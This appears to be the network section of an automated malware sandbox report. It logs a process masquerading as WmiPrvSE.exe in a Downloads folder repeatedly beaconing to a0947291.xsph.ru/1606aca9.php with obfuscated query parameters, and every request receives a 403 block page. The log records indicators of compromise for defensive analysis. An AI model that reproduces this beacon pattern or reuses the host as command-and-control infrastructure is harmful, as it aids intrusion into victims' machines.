                                                Apr 25, 2024 10:21:03.166771889 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166820049 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.167664051 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167706013 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167745113 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167778969 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.167783022 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167821884 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167845011 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.167896032 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167932987 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167944908 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168004990 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168045044 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168060064 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168122053 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168160915 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168216944 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168240070 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168251038 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168256044 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168294907 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168332100 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168354034 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168389082 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168425083 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168447018 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168464899 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168504000 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168515921 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168544054 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168584108 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168620110 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168649912 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168659925 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168673992 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168700933 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168739080 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168745041 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168777943 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168816090 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168850899 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168853998 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168894053 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168931961 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168968916 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168999910 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168999910 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.169011116 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169049025 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169085026 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169101000 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.169121981 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169148922 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.169193983 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169266939 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.169276953 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169317961 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169356108 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169375896 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.171595097 CEST4974880192.168.2.4141.8.194.74
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 25, 2024 10:17:14.977189064 CEST | 63340 | 53 | 192.168.2.4 | 1.1.1.1
Apr 25, 2024 10:17:15.209439993 CEST | 53 | 63340 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 25, 2024 10:17:14.977189064 CEST | 192.168.2.4 | 1.1.1.1 | 0x699e | Standard query (0) | a0947291.xsph.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 25, 2024 10:17:15.209439993 CEST | 1.1.1.1 | 192.168.2.4 | 0x699e | No error (0) | a0947291.xsph.ru | | 141.8.194.74 | A (IP address) | IN (0x0001) | false
                                                • a0947291.xsph.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 141.8.194.74 | 80 | |
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 10:17:15.527973890 CEST | 542 | OUT | GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
Apr 25, 2024 10:17:15.769170046 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:17:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}
                                                Apr 25, 2024 10:17:15.769191980 CEST1289INData Raw: 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74 3a 34 35 30 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69
                                                Data Ascii: .wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:
                                                Apr 25, 2024 10:17:15.769227982 CEST1289INData Raw: 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f 6e
                                                Data Ascii: e{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;heigh
                                                Apr 25, 2024 10:17:15.769274950 CEST1289INData Raw: 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 68 74 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65
                                                Data Ascii: ace:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77
                                                Apr 25, 2024 10:17:15.769318104 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p>
                                                Apr 25, 2024 10:17:15.769367933 CEST1289INData Raw: 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 36 33 2e 39 30 38 37 20 31 39 36 2e 36 37 35 20 36 33 2e 35 32 36 38 20 31 39 36 2e 32 39 32 20 36 34 2e 36 37 32 35 5a 22
                                                Data Ascii: 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 1
                                                Apr 25, 2024 10:17:15.769419909 CEST1289INData Raw: 32 2e 31 36 34 20 39 36 2e 31 37 38 34 20 31 34 31 2e 32 30 38 20 39 37 2e 31 33 33 31 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 33 39 2e 31 30 34 20 39 32 2e 33 36 30 35 4c 31
                                                Data Ascii: 2.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fi
                                                Apr 25, 2024 10:17:15.769438982 CEST1289INData Raw: 30 32 20 39 39 2e 39 39 39 31 20 32 39 34 2e 30 32 39 20 39 39 2e 39 39 39 31 20 32 39 33 2e 34 35 35 20 31 30 30 2e 33 38 31 43 32 39 30 2e 33 39 35 20 31 30 33 2e 34 33 36 20 32 38 37 2e 31 34 33 20 31 30 36 2e 34 39 31 20 32 38 34 2e 30 38 33
                                                Data Ascii: 02 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.892 109.738 260.749 128.26 251.568 139.717C247.36 137.043 243.152 134.561 238.944 131.888C239.136 130.36 239.136 128.833 238.37 127.496C236.267 123.
                                                Apr 25, 2024 10:17:15.769459963 CEST1289INData Raw: 36 39 2e 31 30 30 39 20 36 37 2e 33 34 36 36 20 37 35 2e 30 33 30 31 20 37 33 2e 32 36 36 31 43 38 30 2e 31 39 34 33 20 37 38 2e 34 32 31 37 20 38 35 2e 35 34 39 37 20 38 33 2e 31 39 35 35 20 39 31 2e 36 37 30 32 20 38 37 2e 32 30 35 35 43 39 34
                                                Data Ascii: 69.1009 67.3466 75.0301 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059 112.984 109.649 122.34C109.649 122.34 109.649 122.34 109.458 122.34C100.468 125.586 92.0527
                                                Apr 25, 2024 10:17:15.769475937 CEST1289INData Raw: 35 37 33 38 20 31 32 38 2e 30 36 39 20 31 30 2e 39 35 36 33 20 31 32 38 2e 38 33 33 43 31 31 2e 33 33 38 38 20 31 32 39 2e 34 30 35 20 31 32 2e 31 30 33 39 20 31 32 39 2e 37 38 37 20 31 32 2e 36 37 37 37 20 31 33 30 2e 31 36 39 43 31 33 2e 30 36
                                                Data Ascii: 5738 128.069 10.9563 128.833C11.3388 129.405 12.1039 129.787 12.6777 130.169C13.0602 130.551 13.634 130.742 14.0165 130.933C12.1039 131.506 10.3825 132.843 9.61744 134.752C9.42617 135.134 9.8087 135.516 9.99997 135.898C13.4427 138.38 17.4593 1
                                                Apr 25, 2024 10:17:16.016479969 CEST1289INData Raw: 32 36 2e 38 34 38 20 36 37 2e 35 37 30 38 20 33 32 38 2e 31 38 35 43 37 32 2e 39 32 36 32 20 33 32 39 2e 39 30 33 20 37 39 2e 30 34 36 37 20 33 32 39 2e 31 33 39 20 38 34 2e 34 30 32 31 20 33 32 37 2e 38 30 33 43 38 39 2e 35 36 36 32 20 33 32 36
                                                Data Ascii: 26.848 67.5708 328.185C72.9262 329.903 79.0467 329.139 84.4021 327.803C89.5662 326.466 94.5391 324.748 99.1295 322.265C108.501 317.682 116.726 311.19 123.42 303.17C123.42 308.708 123.42 314.054 123.803 319.592C123.42 319.401 123.229 319.401 12
                                                Apr 25, 2024 10:17:16.287343979 CEST | 518 | OUT | GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:17:16.528044939 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:17:16 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.4 | 49743 | 141.8.194.74 | 80 | 8044 | C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Apr 25, 2024 10:18:51.364372969 CEST | 576 | OUT | GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/html
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:18:51.620924950 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:18:51 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Apr 25, 2024 10:18:52.137105942 CEST | 552 | OUT | GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/html
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:18:52.394088030 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:18:52 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.4 | 49744 | 141.8.194.74 | 80 | 2992 | C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Apr 25, 2024 10:19:29.705931902 CEST | 605 | OUT | GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:19:29.946502924 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:19:29 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Apr 25, 2024 10:19:30.430819988 CEST | 581 | OUT | GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:19:30.671466112 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:19:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.4 | 49745 | 141.8.194.74 | 80 | 6112 | C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Apr 25, 2024 10:19:52.394668102 CEST | 512 | OUT | GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/html
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:19:52.651479006 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:19:52 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Apr 25, 2024 10:19:53.175580978 CEST | 488 | OUT | GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/html
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:19:53.432456970 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:19:53 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.4 | 49746 | 141.8.194.74 | 80 | 4076 | C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Apr 25, 2024 10:20:15.066021919 CEST | 422 | OUT | GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/html
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:20:15.326227903 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:20:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Apr 25, 2024 10:20:15.326493979 CEST | 1289 | IN | Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p>
                                                Apr 25, 2024 10:20:15.846633911 CEST | 398 | OUT | GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/html
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:20:16.105532885 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:20:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                5 | 192.168.2.4 | 49747 | 141.8.194.74 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Apr 25, 2024 10:20:46.362122059 CEST | 516 | OUT | GET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:20:46.602665901 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:20:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Apr 25, 2024 10:20:46.602958918 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p>
                                                Apr 25, 2024 10:20:46.602998018 CEST1289INData Raw: 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 36 33 2e 39 30 38 37 20 31 39 36 2e 36 37 35 20 36 33 2e 35 32 36 38 20 31 39 36 2e 32 39 32 20 36 34 2e 36 37 32 35 5a 22
                                                Data Ascii: 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 1
